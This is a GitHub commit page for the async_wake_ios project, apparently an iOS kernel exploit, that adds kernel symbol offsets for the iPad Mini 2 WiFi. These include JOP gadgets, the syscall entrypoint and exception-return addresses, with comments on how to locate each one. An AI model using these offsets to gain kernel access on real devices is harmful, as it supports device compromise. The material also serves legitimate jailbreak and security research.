Skip to content

Commit c47955b

Browse files
riccardoruspoliriccardoruspoli
authored
Added symbols for iPad Mini 2 WiFi (iPad4,4)
Credits to @cji for finding these symbols.
1 parent cdb548b commit c47955b

File tree

1 file changed

+26
-0
lines changed

1 file changed

+26
-0
lines changed

async_wake_ios/symbols.c

Lines changed: 26 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -178,6 +178,28 @@ uint64_t ksymbols_iphone_6s_15b202[] = {
178178
0xFFFFFFF007194BBC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code."
179179
};
180180

181+
uint64_t ksymbols_ipad_mini_2_wifi_15b202[] = {
182+
0xFFFFFFF0074947EC, // KSYMBOL_OSARRAY_GET_META_CLASS,
183+
0xFFFFFFF007523A98, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS
184+
0xFFFFFFF007525240, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX
185+
0xFFFFFFF0073A6F84, // KSYMBOL_CSBLOB_GET_CD_HASH
186+
0xFFFFFFF0070B8590, // KSYMBOL_KALLOC_EXTERNAL
187+
0xFFFFFFF0070B85C0, // KSYMBOL_KFREE
188+
0xFFFFFFF0070B85BC, // KYSMBOL_RET
189+
0xFFFFFFF0074AE718, // KSYMBOL_OSSERIALIZER_SERIALIZE,
190+
0xFFFFFFF007549D40, // KSYMBOL_KPRINTF
191+
0xFFFFFFF0074B96B0, // KSYMBOL_UUID_COPY
192+
0xFFFFFFF00756E000, // KSYMBOL_CPU_DATA_ENTRIES // 0x6000 in to the data segment
193+
0xFFFFFFF00708818C, // KSYMBOL_VALID_LINK_REGISTER // look for reference to FAR_EL1 (Fault Address Register (EL1))
194+
0xFFFFFFF007088164, // KSYMBOL_X21_JOP_GADGET // look for references to FPCR (Floating-point Control Register)
195+
0xFFFFFFF007088434, // KSYMBOL_EXCEPTION_RETURN // look for references to Set PSTATE.DAIF [--IF]
196+
0xFFFFFFF0070883E4, // KSYMBOL_THREAD_EXCEPTION_RETURN // a bit before exception_return
197+
0xFFFFFFF00719CF44, // KSYMBOL_SET_MDSCR_EL1_GADGET // look for references to MDSCR_EL1
198+
0xFFFFFFF0073F6094, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // look for references to enosys to find the syscall table (this is actually 1 instruction in to the entrypoint)
199+
0xFFFFFFF007198EC0, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP // look for xrefs to "ESR (0x%x) for instruction trapped" and find switch case 49
200+
0xfffffff0071998BC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code."
201+
};
202+
181203
uint64_t ksym(enum ksymbol sym) {
182204
if (kernel_base == 0) {
183205
if (!have_kmem_read()) {
@@ -253,6 +275,10 @@ void offsets_init() {
253275
printf("this is iPhone 6P, should work!\n");
254276
symbols = ksymbol_iphone_6p_15b202;
255277
have_syms = 1;
278+
} else if (strstr(u.machine, "iPad4,4")) {
279+
printf("this is iPad Mini 2 WiFi, should work!\n");
280+
symbols = ksymbols_ipad_mini_2_wifi_15b202;
281+
have_syms = 1;
256282
} else {
257283
printf("no symbols for this device yet\n");
258284
printf("tfp0 should still work, but the kernel debugger PoC won't\n");

0 commit comments

Comments
 (0)